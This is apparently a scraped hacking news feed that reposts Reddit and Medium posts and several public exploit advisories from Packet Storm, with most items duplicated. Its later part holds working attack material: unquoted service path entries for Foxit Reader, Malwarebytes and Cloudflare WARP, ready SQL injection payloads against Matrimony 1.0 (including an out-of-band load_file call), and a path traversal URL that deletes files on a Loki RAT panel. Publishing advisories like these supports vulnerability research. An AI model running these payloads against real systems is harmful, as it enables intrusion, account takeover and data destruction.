Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
https://external-preview.redd.it/k3W30jPDNfqcx3VnHwf61EpkphVKAa9LKOC8fTc_ptE.jpg?width=640&crop=smart&auto=webp&s=0e8af8f476208dd906e81c021699c548e42f136d submitted by /u/FoShizzleMyWeasle
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
https://external-preview.redd.it/k3W30jPDNfqcx3VnHwf61EpkphVKAa9LKOC8fTc_ptE.jpg?width=640&crop=smart&auto=webp&s=0e8af8f476208dd906e81c021699c548e42f136d submitted by /u/FoShizzleMyWeasle
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Critical Cross-Account Vulnerability Found in Microsoft Azure...
Posted in r/hacking by u/FoShizzleMyWeasle • 5 points and 0 comments
hacking: security in practice
CamPhish tool permission requirements
Heyo I was playing around with camphish and realised that in order to take pics, it requires the target to press accept to giving access to their camera . I know there are programs out there that can instantly gain access to a targets webcam without asking for permissions(i see most of them use a evil twin attack) . And mainly is there a way to detect such software if it was planted onto my pc(through clicking on links)
submitted by /u/Barlie2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
CamPhish tool permission requirements
Heyo I was playing around with camphish and realised that in order to take pics, it requires the target to press accept to giving access to their camera . I know there are programs out there that can instantly gain access to a targets webcam without asking for permissions(i see most of them use a evil twin attack) . And mainly is there a way to detect such software if it was planted onto my pc(through clicking on links)
submitted by /u/Barlie2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
CamPhish tool permission requirements
Heyo I was playing around with camphish and realised that in order to take pics, it requires the target to press accept to giving access to their...
hacking: security in practice
Reverse engineering
So I’m in a lot of Linux subreddits, a lot of people damn closed source software to hell meanwhile there is some closed source software that’s cool.
Can’t they make it open source via reverse engineering or decompiling?
If so: why don’t people do this more?
I’m pretty sure only the distribution of the software after the fact would be illegal, I mean you’d have to say goodbye to updates and patches, but???
submitted by /u/605yeeter
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reverse engineering
So I’m in a lot of Linux subreddits, a lot of people damn closed source software to hell meanwhile there is some closed source software that’s cool.
Can’t they make it open source via reverse engineering or decompiling?
If so: why don’t people do this more?
I’m pretty sure only the distribution of the software after the fact would be illegal, I mean you’d have to say goodbye to updates and patches, but???
submitted by /u/605yeeter
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Reverse engineering
So I’m in a lot of Linux subreddits, a lot of people damn closed source software to hell meanwhile there is some closed source software that’s...
hacking: security in practice
A new era of hacking?
With this recent declaration of cyber war by anonymous on the Russian federation, do you guys think this brings in a new era of hacking where gangs of hackers will be in active "gang wars" with other gangs? Just an interesting thought.
submitted by /u/seanie-123
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
A new era of hacking?
With this recent declaration of cyber war by anonymous on the Russian federation, do you guys think this brings in a new era of hacking where gangs of hackers will be in active "gang wars" with other gangs? Just an interesting thought.
submitted by /u/seanie-123
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
A new era of hacking?
With this recent declaration of cyber war by anonymous on the Russian federation, do you guys think this brings in a new era of hacking where...
Making a Career Switch and Looking for Advice
https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/
Hello everyone. So I graduated form college a few years ago with a BFA in Acting and as you can probably guess, its a very hard industry to get into, let alone make a living in your years, thus I've been doing a lot of gig work and serving at restaurants. These jobs haven't been very consistent and moneywise and so I am making a career switch into IT, CyberSec. I was thinking with my acting background that I would be a good fit for Red Team as a social engineer. I should also point out that I am in a CyberSec Bootcamp and am going to come out with a cert in Sec+. I guess what I'm looking for is advice for getting onto Red Team without any real IT background. Any thoughts will be appreciated. THANK YOU submitted by /u/gosh_sammit (https://www.reddit.com/user/gosh_sammit)
[link] (https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/) [comments] (https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/
Hello everyone. So I graduated form college a few years ago with a BFA in Acting and as you can probably guess, its a very hard industry to get into, let alone make a living in your years, thus I've been doing a lot of gig work and serving at restaurants. These jobs haven't been very consistent and moneywise and so I am making a career switch into IT, CyberSec. I was thinking with my acting background that I would be a good fit for Red Team as a social engineer. I should also point out that I am in a CyberSec Bootcamp and am going to come out with a cert in Sec+. I guess what I'm looking for is advice for getting onto Red Team without any real IT background. Any thoughts will be appreciated. THANK YOU submitted by /u/gosh_sammit (https://www.reddit.com/user/gosh_sammit)
[link] (https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/) [comments] (https://www.reddit.com/r/Pentesting/comments/t8ubg6/making_a_career_switch_and_looking_for_advice/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Making a Career Switch and Looking for Advice
Hello everyone. So I graduated form college a few years ago with a BFA in Acting and as you can probably guess, its a very hard industry to get...
Hacking on Medium
PHOTON
https://cdn-images-1.medium.com/max/800/1*onFtwnrVjWk9cEThk-ciIg.png
(LET’S EXPLORE WEBSITE)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PHOTON
https://cdn-images-1.medium.com/max/800/1*onFtwnrVjWk9cEThk-ciIg.png
(LET’S EXPLORE WEBSITE)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PHOTON
(LET’S EXPLORE WEBSITE)
Hacking on Medium
Raising the Stakes: Cyrex & IGaming Security
https://cdn-images-1.medium.com/max/1920/0*1RneZ0aMd6NSLIPF.png
It’s no secret that the worldwide online gambling and IGaming sectors have expanded at a breakneck pace in recent years.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Raising the Stakes: Cyrex & IGaming Security
https://cdn-images-1.medium.com/max/1920/0*1RneZ0aMd6NSLIPF.png
It’s no secret that the worldwide online gambling and IGaming sectors have expanded at a breakneck pace in recent years.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Raising the Stakes: Cyrex & IGaming Security
It’s no secret that the worldwide online gambling and IGaming sectors have expanded at a breakneck pace in recent years.
Hacking on Medium
What is Forking?
https://cdn-images-1.medium.com/max/1080/1*0KHuzhrDrgQ9CT8gGdxmRw.jpeg
101, difference between hard and soft forks, prevalence
Continue reading on Shaping Web3 »
___________________________
@hacking_Attack
@Hacking_Video
What is Forking?
https://cdn-images-1.medium.com/max/1080/1*0KHuzhrDrgQ9CT8gGdxmRw.jpeg
101, difference between hard and soft forks, prevalence
Continue reading on Shaping Web3 »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is Forking?
101, difference between hard and soft forks, prevalence
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Foxit PDF Reader 11.0 Unquoted Service Path
https://2.bp.blogspot.com/-y5QhCp_hFKM/WWlvahEOH0I/AAAAAAAAIPA/Q0VQ49Z0hVw4skegRDdSXm3Bk15Ptyg5wCLcBGAs/s1600/h70.png
Foxit PDF Reader version 11.0 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Foxit PDF Reader 11.0 Unquoted Service Path
https://2.bp.blogspot.com/-y5QhCp_hFKM/WWlvahEOH0I/AAAAAAAAIPA/Q0VQ49Z0hVw4skegRDdSXm3Bk15Ptyg5wCLcBGAs/s1600/h70.png
Foxit PDF Reader version 11.0 suffers from an unquoted service path vulnerability.
MD5 |
af6e2e5a7c7adaa894c56f18040549d4Download
# Exploit Title: Foxit PDF Reader 11.0 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.foxit.com/pdf-reader/
# Software Link: https://www.foxit.com/downloads/#Foxit-Reader/
# Version: 11.0.1.49938
# Tested: Windows 10 Pro x64 es
C:\Users\Hejap>sc qc FoxitReaderUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitReaderUpdateService
TYPE : 110 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit PDF Reader Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Foxit PDF Reader 11.0 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Malwarebytes 4.5 Unquoted Service Path
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Malwarebytes version 4.5 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Malwarebytes 4.5 Unquoted Service Path
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Malwarebytes version 4.5 suffers from an unquoted service path vulnerability.
MD5 |
0efbda2b49f64330eac963f78ac1927dDownload
# Exploit Title: Malwarebytes 4.5 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.malwarebytes.com/
# Software Link: https://www.malwarebytes.com/mwb-download/
# Version: 4.5.0
# Tested: Windows 10 Pro x64 es
C:\Users\Hejap>sc qc MBAMService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MBAMService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Malwarebytes Service
DEPENDENCIES : RPCSS
: WINMGMT
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Malwarebytes 4.5 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Cloudflare WARP 1.4 Unquoted Service Path
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
Cloudflare WARP version 1.4 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Cloudflare WARP 1.4 Unquoted Service Path
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
Cloudflare WARP version 1.4 suffers from an unquoted service path vulnerability.
MD5 |
4edb0796b32e5f29aa038b4280241609Download
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es
C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CloudflareWARP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cloudflare WARP
DEPENDENCIES : wlansvc
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Cloudflare WARP 1.4 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Matrimony 1.0 SQL Injection
https://1.bp.blogspot.com/--r13ngwGJe8/WWlvLp4DX4I/AAAAAAAAIMI/4n3jDvF3elUQ0c2WO1JA-mB24XU3pCyAACLcBGAs/s1600/h17.png
Matrimony version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Matrimony 1.0 SQL Injection
https://1.bp.blogspot.com/--r13ngwGJe8/WWlvLp4DX4I/AAAAAAAAIMI/4n3jDvF3elUQ0c2WO1JA-mB24XU3pCyAACLcBGAs/s1600/h17.png
Matrimony version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
cd2b175a3345aa38a825a2be6405314cDownload
## Title: Matrimony 1.0 SQLi
## Author: nu11secur1ty
## Date: 03.05.2022
## Vendor: https://www.vetbossel.in/matrimony-project-php/
## Software: https://cutt.ly/LOHzKd0,
https://www.vetbossel.in/matrimony-project-php/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony
## Description:
The password parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take administrator account control and also of all
accounts on this system,
also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-5824' OR 4197=4197--
jrsh&password=i0C!o0b!U4'+(select
load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log
in
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: username=VbMOEEMf' AND (SELECT 2589 FROM(SELECT
COUNT(*),CONCAT(0x7178706b71,(SELECT
(ELT(2589=2589,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
gXFR&password=i0C!o0b!U4'+(select
load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log
in
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=VbMOEEMf' AND (SELECT 4030 FROM
(SELECT(SLEEP(5)))ciQI)-- nHot&password=i0C!o0b!U4'+(select
load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log
in
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=-4629' UNION ALL SELECT
CONCAT(0x7178706b71,0x505747504a524d546e7842785156787361686c546c6e695873646952794a545770586447467a4d6b,0x71706a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
-&password=i0C!o0b!U4'+(select
load_file('\\\\bo32v79e9rueo92n0wra9a1d74dx1xposckzbn0.https://www.vetbossel.in/matrimony-project-php/\\qou'))+'&op=Log
in
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/vetbossel.in/2022/Matrimony)
## Proof and Exploit:
[href](https://streamable.com/7gggih)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Matrimony 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Loki RAT (Relapse) Directory Traversal / Arbitrary File Deletion
https://1.bp.blogspot.com/-nibhxYxL_dU/WWlvdqzVqgI/AAAAAAAAIPo/_mHlQijSxHEwrD5GdeVybD20bu3Iyyg_QCLcBGAs/s1600/h8.png
Loki RAT (Relapse) malware suffers from a directory traversal vulnerability that can allow for arbitrary file deletion.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Loki RAT (Relapse) Directory Traversal / Arbitrary File Deletion
https://1.bp.blogspot.com/-nibhxYxL_dU/WWlvdqzVqgI/AAAAAAAAIPo/_mHlQijSxHEwrD5GdeVybD20bu3Iyyg_QCLcBGAs/s1600/h8.png
Loki RAT (Relapse) malware suffers from a directory traversal vulnerability that can allow for arbitrary file deletion.
MD5 |
4bef4a286d43bda4977fcfb80e5556afDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/aabb54951546132e70a8e9f02bf8b5ba.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Loki RAT (Relapse)
Vulnerability: Directory Traversal - Arbitrary File Delete
Description: The LokiRAT WebUI panel for "LokiRAT_Relapse.exe" runs on PHP and MySQL and is used control infected hosts through a central server.
The admin webpage "admin.php" takes four parameters pass, command, id and type. Theres a single check to authenticate $_GET['pass'] against a hardcoded clear-text password in settings.php.
The backend "admin.php" code has an upload feature, it uses PHP "unlink" function to delete a file before moving the new one. However, the code does not
use any secure coding practices, sanitize or filter user input for directory traversal characters "/../". This can allow authenticated users, compromised bots or third-party attackers
who can guess the password check, ability to delete any file E.g. ".php", ".htaccess" etc in the root panel outside the "uploads/" dir, causing Loki web panel to become inoperative.
admin.php snippet:
case "upload":
$fullfilename = "uploads/" . $_GET['filename'];
if (file_exists($fullfilename)) unlink ($fullfilename);
move_uploaded_file($_FILES['file']['tmp_name'], $fullfilename);
Family: Loki
Type: WebUI
MD5: aabb54951546132e70a8e9f02bf8b5ba
MD5: 16c33e28c8c9b3ea71249ad94be4bf94 (admin.php)
Vuln ID: MVID-2022-0509
Disclosure: 03/05/2022
Exploit/PoC:
delete "settings.php" file which holds database connection, rendering the backend inoperative.
http://LOKI-RAT-IP/PHP%20Files/admin.php?pass=test&command=webcam&id=1&type=upload&filename=/../settings.php
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Loki RAT (Relapse) Directory Traversal / Arbitrary File Deletion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.